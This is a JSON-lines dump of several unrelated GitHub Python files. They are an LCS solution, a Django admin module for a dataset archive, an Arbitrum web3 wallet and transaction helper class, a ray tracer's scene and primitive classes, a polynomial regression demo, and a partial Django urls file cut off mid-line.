if (dp[x - 1][y] > dp[x][y - 1]):\n x -= 1\n else:\n y -= 1\n ans.reverse()\n print(dp[N][M])\n print(''.join(ans))\n\n\nsolve()\n","repo_name":"Daejjyu/Algorithm","sub_path":"Jungle/Week4_Dp, Greedy/99_9252_LCS2.py","file_name":"99_9252_LCS2.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"14235534963","text":"import io\n\nfrom daterangefilter.filters import DateRangeFilter\nfrom django.contrib import admin, messages\nfrom django.contrib.admin import ModelAdmin\nfrom django.contrib.admin.utils import model_ngettext\nfrom django.core.exceptions import PermissionDenied, ValidationError\nfrom django.forms import forms\nfrom django.shortcuts import redirect, render\nfrom django.urls import path\nfrom django.utils.datetime_safe import datetime\n\nfrom archive_api.models import DataSet, DataSetDownloadLog, MeasurementVariable, Person, Plot, Site\n\n\nclass CsvImportForm(forms.Form):\n csv_file = forms.FileField()\n\n\n@admin.register(MeasurementVariable)\nclass MeasurementVariableAdmin(ModelAdmin):\n list_display = ('name',)\n\n\n@admin.register(Person)\nclass PersonAdmin(ModelAdmin):\n\n change_list_template = \"entities/persons_change_list.html\"\n list_display = ('first_name', 'last_name', 'institution_affiliation','email', 'orcid')\n actions = ('download_csv',)\n\n def get_urls(self):\n \"\"\"\n Extends ancestor by adding update_orcids/ path to returned URLs for this view\n :return:\n \"\"\"\n urls = super().get_urls()\n my_urls = [\n path('update-orcids/', self.update_orcids),\n ]\n return my_urls + urls\n\n def update_orcids(self, request, ):\n \"\"\" Allow users to update orcids\"\"\"\n\n import csv\n expected_headers = {'first_name', 'last_name', 'institution_affiliation', 'email', 'orcid'}\n\n # Only allow POST method\n if request.method == \"POST\":\n csv_file = request.FILES[\"csv_file\"]\n\n # Fail if not CSV file\n if csv_file.content_type == 'text/csv':\n\n # Upload file is a BytesIO and the csv reader needs a string\n file_wrapper = io.TextIOWrapper(csv_file.file, encoding='utf-8')\n\n header = None\n updated_count = 0\n reader = csv.reader(file_wrapper)\n for row in reader:\n if not header:\n header = row\n if expected_headers.difference(set(header)):\n self.message_user(request, f\"Cancelling update. Your header row is missing: {expected_headers.difference(set(header))}\")\n break\n else:\n if len(header) != len(row):\n self.message_user(request,\n f\"Cancelling update. Data row is invalid: {row}\")\n break\n else:\n result_dict = dict(zip(header, row))\n # Create Person objects from passed in data\n\n try:\n # Find the perscon record.\n # if first_name, last_name, institiution and email are not found,\n # not records are updated.\n person = Person.objects.get(first_name=result_dict['first_name'],\n last_name=result_dict['last_name'],\n institution_affiliation=result_dict[\n 'institution_affiliation'],\n email=result_dict['email'])\n\n # Assign the orcid. We are not checking if the ORCiD exists or\n # is being changed.\n person.orcid = result_dict['orcid']\n\n # Full clean forces validation\n person.full_clean()\n person.save()\n updated_count += 1\n except Person.DoesNotExist:\n self.message_user(request, f\"NOT FOUND {list(result_dict.values())}\", level=messages.WARNING)\n except ValidationError as e:\n # Do something based on the errors contained in e.message_dict.\n # Display them to a user, or handle them programmatically.\n for msg in e.messages:\n self.message_user(request, f\"{msg} {list(result_dict.values())}\", level=messages.ERROR)\n\n self.message_user(request, f\"{updated_count} records found and were updated.\",\n level=updated_count and messages.INFO or messages.WARNING)\n\n else:\n self.message_user(request, \"File must be text/csv. Your csv file has NOT been imported\")\n return redirect(\"..\")\n\n form = CsvImportForm()\n payload = {\"form\": form}\n return render(\n request, \"admin/csv_form.html\", payload\n )\n\n def download_csv(self, request, queryset):\n \"\"\"\n Allow users to download the selected records\n\n :param request:\n :param queryset:\n :return:\n \"\"\"\n import csv\n from django.http import HttpResponse\n import io\n\n f = io.StringIO()\n writer = csv.writer(f)\n writer.writerow(['first_name', 'last_name', 'institution_affiliation', 'email', 'orcid'])\n\n for row in queryset:\n writer.writerow([row.first_name, row.last_name, row.institution_affiliation, row.email,\n row.orcid\n ])\n\n f.seek(0)\n response = HttpResponse(f, content_type='text/csv')\n current_date = datetime.now().strftime(\"%Y%m%dT%H%M\")\n response['Content-Disposition'] = f'attachment; filename=download_ngeet_people_{current_date}.csv'\n return response\n\n download_csv.short_description = \"Download CSV file for selected people\"\n\n\n\n@admin.register(Plot)\nclass PlotAdmin(ModelAdmin):\n list_display = ('plot_id', 'description',)\n\n\n@admin.register(Site)\nclass SiteAdmin(ModelAdmin):\n list_display = ('site_id', 'name', 'description',)\n\n\n@admin.register(DataSet)\nclass DraftDataSetAdmin(ModelAdmin):\n\n actions = (\"mark_as_deleted\",)\n list_display = ('ngt_id', 'version','name', 'created_by', 'created_date','modified_by','modified_date',)\n readonly_fields = ('ngt_id', 'version', 'name', 'created_by', 'created_date','modified_by','modified_date',)\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Override the parent method in order to remove display links\n that navigate to show info page.\n :param args:\n :param kwargs:\n \"\"\"\n super(self.__class__, self).__init__(*args, **kwargs)\n self.list_display_links = None # no display links\n\n # This will affect the Title of the page on in the Admin site\n self.model._meta.verbose_name = 'Draft data set'\n self.model._meta.verbose_name_plural = 'Draft data sets'\n\n def get_actions(self, request):\n \"\"\"Overrides parent. Removed the delete selected action\"\"\"\n actions = super(self.__class__, self).get_actions(request)\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n def get_queryset(self, request):\n \"\"\"\n Returns a QuerySet of all DRAFT DataSets\n \"\"\"\n qs = super(DraftDataSetAdmin,self).get_queryset(request)\n return qs.filter(status=DataSet.STATUS_DRAFT)\n\n def has_add_permission(self, request):\n \"\"\"\n Disallow add through the admin interface. These records\n should only be created in the main site\n\n param request:\n :return: False\n \"\"\"\n return False\n\n def mark_as_deleted(self, request, queryset):\n \"\"\"\n Mark the DRAFT Datasets as deleted. Datasets marked\n as deleted will not show up in the Archive Service\n\n :param request: The current http request\n :param queryset: the selected objects to mark deleted\n :return: None\n \"\"\"\n\n # Check that the user has delete permission for the actual model\n if not self.has_delete_permission(request):\n raise PermissionDenied\n\n n = queryset.count()\n if n:\n for obj in queryset:\n # We just want to mark deleted NOT physically delte\n obj.status = DataSet.STATUS_DELETED\n obj.save()\n\n self.message_user(request,\n \"Successfully marked %(count)d %(items)s as DELETED.\" % {\n \"count\": n,\n \"items\": model_ngettext(self.opts, n)\n }, messages.SUCCESS)\n # Return None to display the change list page again.\n return None\n\n mark_as_deleted.short_description = \"Mark draft data sets as DELETED\"\n\n\n@admin.register(DataSetDownloadLog)\nclass DataSetDownloadLogAdmin(ModelAdmin):\n \"\"\"\n This Admin interface allows user to search by date range and user. The resulting items\n in the list may be downloaded to a CSV file\n \"\"\"\n list_filter = (('datetime',DateRangeFilter),'user',)\n actions = ('download_csv',)\n list_display = ('datetime', 'user_name', 'dataset_status', 'dataset', 'request_url',)\n readonly_fields = ('datetime', 'user', 'dataset_status', 'dataset', 'request_url', 'ip_address')\n\n fieldsets = [\n (None, {'fields': ()}),\n ]\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Override the parent method in order to remove display links\n that navigate to show info page.\n :param args:\n :param kwargs:\n \"\"\"\n super(self.__class__, self).__init__(*args, **kwargs)\n self.list_display_links = None # no display links\n\n def get_actions(self, request):\n \"\"\"Overrides parent. Removed the delete selected action\"\"\"\n actions = super(self.__class__, self).get_actions(request)\n if 'delete_selected' in actions:\n del actions['delete_selected']\n return actions\n\n def has_add_permission(self, request):\n \"\"\"\n Disallow add through the admin interface. These records\n should only be created when a DataSet archive file is downloaded\n :param request:\n :return:\n \"\"\"\n return False\n\n def has_delete_permission(self, request, obj=None):\n \"\"\"\n Disallow delete from anywhere in the admin interface. These records are\n never to be deleted.\n\n :param request:\n :param obj:\n :return:\n \"\"\"\n return False\n\n def user_name(self, obj):\n \"\"\"\n Format the user name with full name and email address.\n :param obj:\n :return:\n \"\"\"\n return \"{} <{}>\".format(obj.user.get_full_name(), obj.user.email)\n\n def download_csv(self, request, queryset):\n \"\"\"\n Allow users to download the selected records\n\n :param request:\n :param queryset:\n :return:\n \"\"\"\n import csv\n from django.http import HttpResponse\n import io\n\n f = io.StringIO()\n writer = csv.writer(f)\n writer.writerow([\"datetime\", \"user_name\", \"dataset_status\", 'dataset_name', \"ip_address\", \"request_url\"])\n\n for row in queryset:\n writer.writerow([row.datetime, self.user_name(row),row.get_dataset_status_display(),\n str(row.dataset), row.ip_address, row.request_url\n ])\n\n f.seek(0)\n response = HttpResponse(f, content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=download_log.csv'\n return response\n\n download_csv.short_description = \"Download CSV file for selected download activity.\"\n\n\n","repo_name":"heycatwonton/ngt-archive","sub_path":"archive_api/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":11902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"1046464894","text":"import config\n\nimport time\nfrom time import sleep\nimport random\nimport config\nimport datetime\nimport requests\nimport eth_abi\n\nfrom loguru import logger\nfrom decimal import Decimal\nfrom pycoingecko import CoinGeckoAPI\nfrom web3 import Web3, HTTPProvider\n\n\nclass ArbitrumCore:\n def __init__(self, run: str, network: str) -> None:\n # FOR PROD\n if (\n run\n == \"Special for https://t.me/importweb3, creator - https://t.me/vladweat\"\n ):\n logger.info(f\"{run}\")\n pass\n else:\n logger.error(f\"Fatal error in script. FO!\")\n raise SystemExit(1)\n\n self._web3 = self._set_web3_rpc(network)\n self._wallets_dict = self.__create_wallets_dict()\n self._len_wallets_dict = self.__get_len_wallets_dict()\n\n def _set_web3_rpc(self, network: str) -> Web3:\n \"\"\"RPC setter\n\n Args:\n network (str): string with name of network\n\n Raises:\n SystemExit: if wrong network string input\n\n Returns:\n Web3: Web3 class\n \"\"\"\n from web3.middleware import geth_poa_middleware\n\n if network == \"arbitrum\":\n return Web3(HTTPProvider(config.ARBITRUM_RPC))\n elif network == \"mainnet\":\n return Web3(HTTPProvider(config.MAINNET_RPC))\n elif network == \"optimism\":\n return Web3(HTTPProvider(config.OPTIMISM_RPC))\n else:\n logger.error(f\"Wrong network RPC. Change it!\")\n raise SystemExit(1)\n\n def _change_network_rpc(self, network: str) -> None:\n \"\"\"Change network rpc by string\n\n Args:\n network (str): string with name of network\n \"\"\"\n self._web3 = self._set_web3_rpc(network)\n\n def _check_connection(self) -> bool:\n \"\"\"Check connection to RPC URL\n\n Returns:\n bool: connection status\n \"\"\"\n try:\n return self._web3.isConnected()\n except Exception as e:\n logger.error(e)\n\n def _get_private_keys(self) -> list:\n \"\"\"Return list of private keys from wallets.txt\n\n Returns:\n list: keys\n \"\"\"\n try:\n with open(\"private_keys.txt\", \"r\") as file:\n keys = file.read().splitlines()\n\n return keys\n\n except Exception as e:\n logger.error(e)\n\n def _check_private_keys(self) -> None:\n \"\"\"Checking private keys for validity\n\n Raises:\n SystemExit: if 'Non-hexadecimal digit found' raised\n \"\"\"\n if None in self._wallets_dict.values():\n logger.error(f\"Fatal error in script. Change keys above!\")\n raise SystemExit(1)\n else:\n logger.success(f\"Private key verification passed!\")\n\n def _get_address(self, private_key: str = None) -> str:\n \"\"\"Return address from _wallets_dict[private_key]\n\n Args:\n private_key (str, optional): private key. Defaults to None.\n\n Returns:\n str: address from _wallets_dict[private_key]\n \"\"\"\n try:\n address = self._wallets_dict.get(private_key)\n return address\n except Exception as e:\n logger.error(e)\n\n def _get_balance(self, private_key: str = None) -> float:\n \"\"\"Get balance of address generated from _get_address(private_key)\n\n Args:\n private_key (str, optional): private key. Defaults to None.\n\n Returns:\n float: address balance\n \"\"\"\n try:\n address = self._get_address(private_key)\n # balance = self._convert_from_ether_format(\n # self._web3.eth.get_balance(address)\n # )\n balance = self._web3.eth.get_balance(address)\n return balance\n except Exception as e:\n logger.error(e)\n\n def _get_nonce(self, private_key: str) -> int:\n \"\"\"Return nonce of address from private_key\n\n Args:\n private_key (str): private key\n\n Returns:\n int: nonce\n \"\"\"\n try:\n address = self.__get_address(private_key)\n nonce = self._web3.eth.get_transaction_count(address)\n return nonce\n except Exception as e:\n logger.error(e)\n\n def _convert_from_ether_format(self, num: int = None) -> float:\n \"\"\"Convert Wei to Ether format\n 100000000000000000000 -> 100\n\n Args:\n num (integer): wei format integer\n\n Returns:\n float: _description_\n \"\"\"\n try:\n ether_format = self._web3.fromWei(num, \"ether\")\n return ether_format\n except Exception as e:\n logger.error(e)\n\n def _convert_to_ether_format(self, num: float = None) -> int:\n \"\"\"Convert Ether to Wei format\n 100 -> 100000000000000000000\n Args:\n num (float): ether format integer\n\n Returns:\n int: _description_\n \"\"\"\n try:\n wei_format = self._web3.toWei(Decimal(num), \"ether\")\n return wei_format\n except Exception as e:\n logger.error(e)\n\n def _convert_from_mwei_format(self, num: int = None) -> float:\n \"\"\"Convert Wei to Mwei format\n 1000000 -> 1\n Args:\n num (integer): wei format integer\n\n Returns:\n float: _description_\n \"\"\"\n try:\n ether_format = self._web3.fromWei(num, \"mwei\")\n return ether_format\n except Exception as e:\n logger.error(e)\n\n def _convert_to_mwei_format(self, num: float = None) -> int:\n \"\"\"Convert Mwei to Wei format\n 1 -> 1000000\n Args:\n num (float): ether format integer\n\n Returns:\n int: _description_\n \"\"\"\n try:\n wei_format = self._web3.toWei(Decimal(num), \"mwei\")\n return wei_format\n except Exception as e:\n logger.error(e)\n\n def _get_checksum_address(self, address: str) -> str:\n \"\"\"Return toChecksumAddress(address)\n\n Args:\n address (str): address\n\n Returns:\n str: toChecksumAddress(address)\n \"\"\"\n try:\n checksum_address = self._web3.toChecksumAddress(address)\n return checksum_address\n except Exception as e:\n logger.error(e)\n\n def _sign_transaction(self, transaction, private_key: str) -> dict:\n \"\"\"Wrapper for web.eth.account.sign_transaction\n\n Args:\n transaction (_type_): transaction.method().buildTransaction()\n private_key (str): private key\n\n Returns:\n signed_tx: web3.eth.account.sign_transaction()\n \"\"\"\n try:\n signed_tx = self._web3.eth.account.sign_transaction(\n transaction, private_key\n )\n return signed_tx\n except Exception as e:\n logger.error(e)\n\n def _send_raw_transaction(self, sign_txn: dict) -> str:\n \"\"\"Wrapper for web3.eth.send_raw_transaction\n\n Args:\n sign_txn (_type_): sign_txn\n\n Returns:\n raw_tx_hash: raw_tx_hash\n \"\"\"\n try:\n raw_tx_hash = self._web3.eth.send_raw_transaction(sign_txn.rawTransaction)\n return raw_tx_hash\n except Exception as e:\n logger.error(e)\n\n def _get_tx_hash(self, raw_tx_hash: str) -> str:\n \"\"\"Wrapper for web3.toHex\n\n Args:\n raw_tx_hash (_type_): raw_tx_hash\n\n Returns:\n tx_hash: tx_hash\n \"\"\"\n try:\n tx_hash = self._web3.toHex(raw_tx_hash)\n return tx_hash\n except Exception as e:\n logger.error(e)\n\n def __create_wallets_dict(self) -> dict:\n \"\"\"Created dict with key:address args\n\n Returns:\n dict: dict{ private_key: 'address' }\n \"\"\"\n try:\n private_keys = self._get_private_keys()\n wallets_dict = {}\n\n for key in private_keys:\n wallets_dict[key] = self.__get_address(key)\n\n return wallets_dict\n except Exception as e:\n logger.error(e)\n\n def __get_len_wallets_dict(self) -> int:\n \"\"\"Return length of self._wallets_dict\n\n Returns:\n int: len of self._wallets_dict\n \"\"\"\n return len(self._wallets_dict)\n\n def __get_address(self, private_key: str = None) -> str:\n \"\"\"Return address generated from private_key\n\n Args:\n private_key (str, optional): private key. Defaults to None.\n\n Returns:\n str: address generated with web3.eth.account.from_key\n \"\"\"\n if type(private_key) == str:\n try:\n account = self._web3.eth.account.from_key(private_key)\n return account.address\n\n except Exception as e:\n logger.error(f'{e}: Change key \"{private_key}\"')\n else:\n logger.error(\n f\"Сan't get address from private key. Private key format is {type(private_key)}, must be <class 'str'>!\"\n )\n\n def _wait_for_transaction_receipt(self, tx_hash) -> bool:\n \"\"\"Wrapper for web3.eth.waitForTransactionReceipt()\n\n Args:\n tx_hash (str): hash from scan\n\n Returns:\n bool: bool\n \"\"\"\n while True:\n try:\n tx_status = self._web3.eth.waitForTransactionReceipt(tx_hash).status\n if tx_status == 1:\n logger.success(f\"Tx {tx_hash} CONFIRMED\")\n return True\n else:\n sleep(3)\n except Exception as e:\n logger.error(e)\n\n def _is_encodable(self, value, value_name, value_type) -> str:\n _value = value\n _value_name = str(value_name)\n _type = str(value_type)\n _is_encodable_str = (\n f\"{_value_name} is {_type}? {self._web3.is_encodable(_type, _value)}\"\n )\n return _is_encodable_str\n\n def _add_random_delay(self, min, max) -> bool:\n \"\"\"Add random delay in [min, max]\n\n Args:\n min (int): min sec\n max (int): max sec\n\n Returns:\n bool: bool\n \"\"\"\n time.sleep(random.randint(min, max))\n return True\n\n def _get_chain_id(self) -> int:\n \"\"\"Wrapper for web3.eth.chain_id\n\n Returns:\n int: chain id\n \"\"\"\n return self._web3.eth.chain_id\n\n def _get_gas_price(self) -> int:\n \"\"\"Wrapper for web3.eth.gas_price\n\n Returns:\n int: gas price\n \"\"\"\n return self._web3.eth.gas_price\n\n def _get_gas_limit(self, from_address: str, to_address: str, value: int) -> int:\n \"\"\"Wrapper for web3.eth.estimate_gas\n\n Args:\n from_address (str): transaction.from\n to_address (str): transaction.to\n value (int): transaction.value\n\n Returns:\n int: gas limit\n \"\"\"\n gas_limit = self._web3.eth.estimate_gas(\n {\"to\": to_address, \"from\": from_address, \"value\": value}\n )\n return gas_limit\n\n def _build_tx_param(\n self, from_private_key: str, to_address: str, value: int\n ) -> dict:\n \"\"\"Build transaction parametrs\n\n Args:\n from_private_key (str): private key\n to_address (str): transaction.to\n value (int): transaction.value\n\n Returns:\n dict: transaction_param\n \"\"\"\n address = self._get_checksum_address(self._get_address(from_private_key))\n _to_address = self._get_checksum_address(to_address)\n\n estimate = self._web3.eth.estimate_gas(\n {\"to\": _to_address, \"from\": address, \"value\": value}\n )\n gas_limit = estimate\n\n transaction_param = {\n \"chainId\": self._get_chain_id(),\n \"from\": address,\n \"nonce\": self._get_nonce(from_private_key),\n \"to\": _to_address,\n \"value\": value,\n \"gas\": gas_limit,\n \"maxPriorityFeePerGas\": self._web3.toWei(5, \"gwei\"),\n \"maxFeePerGas\": self._web3.toWei(10, \"gwei\"),\n # \"gasPrice\": self._get_gas_price(),\n \"type\": \"0x2\",\n }\n\n return transaction_param\n\n def _build_contract_tx_param(self, from_private_key: str, value: int) -> dict:\n \"\"\"Build transaction parametrs to contract\n\n Args:\n from_private_key (str): private key\n value (int): transaction.value\n\n Returns:\n dict: transaction_param\n \"\"\"\n address = self._get_checksum_address(self._get_address(from_private_key))\n\n transaction_param = {\n \"chainId\": self._get_chain_id(),\n \"from\": address,\n \"nonce\": self._get_nonce(from_private_key),\n \"value\": value,\n \"type\": \"0x2\",\n # \"gasPrice\": self._get_gas_price(),\n }\n\n return transaction_param\n\n def _sign_send_get_tx_hash(self, transaction: dict, private_key: str) -> str:\n \"\"\"Wrapper for sign_transaction / send_raw_transaction / get_tx_hash\n\n Args:\n transaction (dict): transaction_param\n private_key (str): private_key\n\n Returns:\n str: transaction hash\n \"\"\"\n signed_transaction = self._sign_transaction(transaction, private_key)\n raw_tx_hash = self._send_raw_transaction((signed_transaction))\n tx_hash = self._get_tx_hash(raw_tx_hash)\n return tx_hash\n\n def _get_token_price(self, coingecko_token_id: str) -> float:\n \"\"\"Return USD value of coingecko_token_id\n\n Args:\n coingecko_token_id (str): token id from https://www.coingecko.com/\n\n Returns:\n float: USD value of token\n \"\"\"\n try:\n cg = CoinGeckoAPI()\n token_price_req = cg.get_price(ids=coingecko_token_id, vs_currencies=\"usd\")\n token_price = float(token_price_req[f\"{coingecko_token_id}\"][\"usd\"])\n return token_price\n\n except Exception as e:\n logger.error(e)\n\n def _get_transaction_receipt(self, tx_hash: str) -> dict:\n \"\"\"Wrapper for web3.eth.get_transaction()\n\n Args:\n tx_hash (str): transaction hash\n\n Returns:\n dict: transaction receipt\n \"\"\"\n transaction = self._web3.eth.get_transaction(tx_hash)\n return transaction\n\n def _get_fee_value(self, tx_hash: str) -> int:\n \"\"\"Get fee value of transaction\n\n Args:\n tx_hash (str): transaction hash\n\n Returns:\n int: gas value\n \"\"\"\n transaction = self._get_transaction_receipt(tx_hash)\n gas_limit = transaction[\"gas\"]\n gas_price = transaction[\"gasPrice\"]\n fee_value = gas_limit * self._convert_from_ether_format(gas_price)\n return fee_value\n\n def _get_fee_cost(self, tx_hash: str) -> float:\n \"\"\"Geet fee cost from fee value\n\n Args:\n tx_hash (str): transaction hash\n\n Returns:\n float: fee in usdc\n \"\"\"\n fee_value = self._get_fee_value(tx_hash)\n fee_cost = self._get_token_price(\"ethereum\") * float(fee_value)\n return fee_cost\n","repo_name":"vladweat/cr_p_arbitrum_client","sub_path":"arbitrum_core.py","file_name":"arbitrum_core.py","file_ext":"py","file_size_in_byte":15308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"43032329278","text":"# Modules\nfrom PyRT_Common import *\nfrom abc import ABC, abstractmethod # Abstract Base Class\nfrom math import tan\nimport numpy as np\n\n\n# -------------------------------------------------BRDF classes\nclass Scene:\n def __init__(self):\n self.camera = None\n self.env_map = None # not initialized\n self.rendered_image = None\n self.object_list = [] # object list\n self.pointLights = [] # list of point light sources (for Phong Illumination)\n self.i_a = None # ambient lighting\n\n def set_ambient(self, i_a):\n self.i_a = i_a\n\n # set camera\n def set_camera(self, camera):\n self.camera = camera\n self.rendered_image = np.zeros((camera.height, camera.width, 3))\n\n # set environment map\n def set_environment_map(self, env_map_path):\n self.env_map = EnvironmentMap(env_map_path)\n\n # add objects\n def add_object(self, new_object):\n self.object_list.append(new_object)\n\n # add point light sources\n def add_point_light_sources(self, point_light):\n self.pointLights.append(point_light)\n\n def any_hit(self, ray):\n # ASSIGNMENT 1.2: PUT YOUR CODE HERE\n for i in range(len(self.object_list)):\n this_hit = self.object_list[i].intersect(ray)\n if this_hit.has_hit: # Hit\n return True\n return False\n\n def closest_hit(self, ray):\n # find closest hit object, its distance, hit_point and normal\n # scan through primitives in scene, find closest\n hit_data = HitData()\n for i in range(len(self.object_list)):\n this_hit = self.object_list[i].intersect(ray)\n if this_hit.has_hit: # Hit\n if this_hit.hit_distance < hit_data.hit_distance: # Distance\n hit_data = this_hit\n hit_data.primitive_index = i\n return hit_data\n\n # save pixel array to file\n def save_image(self, full_filename):\n tonemapper = cv2.createTonemap(gamma=2.5)\n image_nd_array_ldr = tonemapper.process(self.rendered_image.astype(np.single))\n plt.imsave(full_filename + '.png', np.clip(image_nd_array_ldr, 0, 1))\n np.save(full_filename, self.rendered_image)\n cv2.imwrite(full_filename + '.hdr', cv2.cvtColor(self.rendered_image.astype('float32'), cv2.COLOR_RGB2BGR));\n print(\"Image Saved\")\n\n # set pixel value\n def set_pixel(self, pixel_val, x, y):\n # pixel_val.clamp(0.0, 1.0)\n self.rendered_image[y, x, 0] = pixel_val.r\n self.rendered_image[y, x, 1] = pixel_val.g\n self.rendered_image[y, x, 2] = pixel_val.b\n\n\n# -------------------------------------------------Primitive classes\nclass Primitive(ABC):\n def __init__(self, emission=BLACK):\n self.emission = emission\n self.BRDF = None\n\n @abstractmethod\n def intersect(self, ray):\n pass\n\n # Setters\n def set_BRDF(self, BRDF):\n self.BRDF = BRDF\n\n # Getters\n def get_BRDF(self):\n return self.BRDF\n\n\n# Sphere\nclass Sphere(Primitive):\n # Initializer\n def __init__(self, sphere_origin, sphere_radius, emission=BLACK):\n super().__init__(emission)\n self.origin = sphere_origin\n self.radius = sphere_radius\n self.radius_squared = sphere_radius * sphere_radius # optimization\n\n # Member Functions\n # Returns tuple of (bool hit, distance, hit_point, normal)\n def intersect(self, ray):\n ray_dir = Normalize(ray.d)\n temp = np.subtract(ray.o, self.origin)\n A = Dot(ray_dir, ray_dir)\n B = 2.0 * Dot(ray_dir, temp)\n C = Dot(temp, temp) - self.radius_squared\n\n disc = (B * B) - (4.0 * A * C) # Discriminant\n\n if disc < 0.0: # No Hit\n return HitData() # return an 'empty' HitData object (no intersection)\n\n sqrt_disc = sqrt(disc) # square root of discriminant\n\n t_small = (-B - sqrt_disc) / (2.0 * A)\n if t_small >= ray.t_min and t_small <= ray.t_max: # Hit\n p = ray.get_hitpoint(t_small)\n n = Normalize((p - self.origin) / self.radius)\n return HitData(has_hit=True, hit_point=p, normal=n, hit_distance=t_small)\n\n t_large = (-B + sqrt_disc) / (2.0 * A)\n if t_large >= ray.t_min and t_large <= ray.t_max: # Hit\n p = ray.get_hitpoint(t_large)\n n = Normalize((p - self.origin) / self.radius)\n return HitData(has_hit=True, hit_point=p, normal=n, hit_distance=t_large)\n\n # Ray did not intersect sphere\n return HitData()\n\n\n# Plane\nclass InfinitePlane(Primitive):\n # Initializer\n def __init__(self, plane_origin, plane_normal, emission=BLACK):\n super().__init__(emission)\n self.origin = plane_origin\n self.normal = Normalize(plane_normal)\n\n # Member Functions\n # Returns tuple of (bool hit, distance, hit_point, normal)\n def intersect(self, ray):\n ray_dir = Normalize(ray.d)\n denominator = Dot(ray_dir, self.normal)\n if denominator == 0.0: # Check for division by zero\n # ray is parallel, no hit\n return HitData()\n\n t = Dot(self.normal, (self.origin - ray.o)) / denominator\n if t >= ray.t_min and t <= ray.t_max: # Hit\n p = ray.get_hitpoint(t)\n return HitData(has_hit=True, hit_point=p, normal=self.normal, hit_distance=t)\n\n # Ray did not intersect plane\n return HitData()\n\n\n# Plane\nclass Parallelogram(Primitive):\n # Initializer\n def __init__(self, point, s1, s2, emission=BLACK):\n super().__init__(emission)\n self.point = point # point (a corner of the rectangle\n self.s1 = s1 # side 1\n self.s2 = s2 # side 2\n self.s1_n = Normalize(s1)\n self.s2_n = Normalize(s2)\n self.s1_l = Length(s1)\n self.s2_l = Length(s2)\n self.normal = Normalize(Cross(s1, s2))\n\n # Member Functions\n # Returns tuple of (bool hit, distance, hit_point, normal)\n def intersect(self, ray):\n ray_dir = Normalize(ray.d)\n normal_ = self.normal\n denominator = Dot(ray_dir, normal_)\n if denominator == 0.0: # Check for division by zero\n # ray is parallel, no hit\n return HitData()\n\n t = Dot(normal_, (self.point - ray.o)) / denominator\n if t >= ray.t_min and t <= ray.t_max: # Hit\n p_hit = ray.get_hitpoint(t)\n # Check whether p is within the square limits\n p_ph = p_hit - self.point # 3D vector from point to p_hit\n\n # Project p_ph onto s1 and s2\n p_ph_n = Normalize(p_ph)\n p_ph_l = Length(p_ph)\n cos_alpha1 = Dot(self.s1_n, p_ph_n)\n cos_alpha2 = Dot(self.s2_n, p_ph_n)\n q1 = cos_alpha1 * p_ph_l\n q2 = cos_alpha2 * p_ph_l\n\n if q1 < 0.0 or q2 < 0.0 or q1 > self.s1_l or q2 > self.s2_l:\n return HitData()\n\n if Dot(self.normal, ray_dir) > 0:\n normal_ = self.normal * (-1)\n return HitData(has_hit=True, hit_point=p_hit, normal=normal_, hit_distance=t)\n\n # Ray did not intersect plane\n return HitData()\n\n\n# -------------------------------------------------BRDF classes\nclass BRDF(ABC):\n @abstractmethod\n def get_value(self, incoming, outgoing, normal):\n pass\n\n\n# Lambertian (perfect diffuse material)\nclass Lambertian(BRDF):\n # Initializer\n def __init__(self, diffuse_colour):\n self.kd = diffuse_colour * INVERTED_PI\n\n # Member Functions\n # wi Direcio de llum\n def get_value(self, wi, wo, normal):\n cos_n_wi = Dot(normal, wi)\n if Dot(normal, wi) > 0.0:\n return self.kd * cos_n_wi # Colour\n else:\n return BLACK\n\n\n# -------------------------------------------------Point Light Source Class\nclass PointLight:\n def __init__(self, pos_, intensity_):\n self.pos = pos_\n self.intensity = intensity_\n\n\n# -------------------------------------------------Camera Class\nclass Camera:\n # Initializer\n def __init__(self, width_, height_, vertical_fov_):\n self.width = width_\n self.height = height_\n self.vertical_fov = vertical_fov_ / 180 * PI\n self.aspect_ratio = width_ / height_\n\n def get_direction(self, x, y):\n # Convert from pixel coordinates to screen space\n x_ss = 2.0 * (x + 0.5) / self.width - 1.0\n y_ss = 1.0 - 2.0 * (y + 0.5) / self.height\n # Convert from screen space to camera space\n tan_half_fov = tan(self.vertical_fov / 2.0)\n x_cs = x_ss * tan_half_fov * self.aspect_ratio\n y_cs = y_ss * tan_half_fov\n p_cs = Vector3D(x_cs, y_cs, -1.0)\n # Compute the ray direction in camera space\n direction = Normalize(p_cs) # because camera is always at (0,0,0)\n return direction\n","repo_name":"MateoProjects/MAI","sub_path":"MLCG/Labs/P1_base_code_2021_2022/PyRT_Core.py","file_name":"PyRT_Core.py","file_ext":"py","file_size_in_byte":8823,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"21887662231","text":"# Bad fit\n# an example where polynomial regression would not be the best method to predict future values\n\nimport numpy\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import r2_score\n\nx = [89,43,36,36,95,10,66,34,38,20,26,29,48,64,6,5,36,66,72,40]\ny = [21,46,3,35,67,95,53,72,58,10,26,34,90,33,38,20,56,2,47,15]\n\n\nmymodel = numpy.poly1d(numpy.polyfit(x, y, 3))\n\n# One should also get a very low r-squared value for a bad fit\nprint(\"R squared relationship:\", r2_score(y, mymodel(x)))\n\nmyline = numpy.linspace(2, 95, 100)\n\nplt.scatter(x, y)\n\nplt.plot(myline, mymodel(myline))\n\nplt.show()","repo_name":"eRaBxEs/MachineLearningSimplified","sub_path":"step8-polynomial_regression/poly-regression-f.py","file_name":"poly-regression-f.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74026957905","text":"from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\n\n\nurlpatterns = [\n path('professor_registration/', views.professor_registration, name='professor_registration'),\n path('professor_login/', views.professor_login, name='professor_login'),\n path('professor_success/', views.professor_success, name='professor_success'),\n\n path('adminong_registration/', views.adminong_registration, 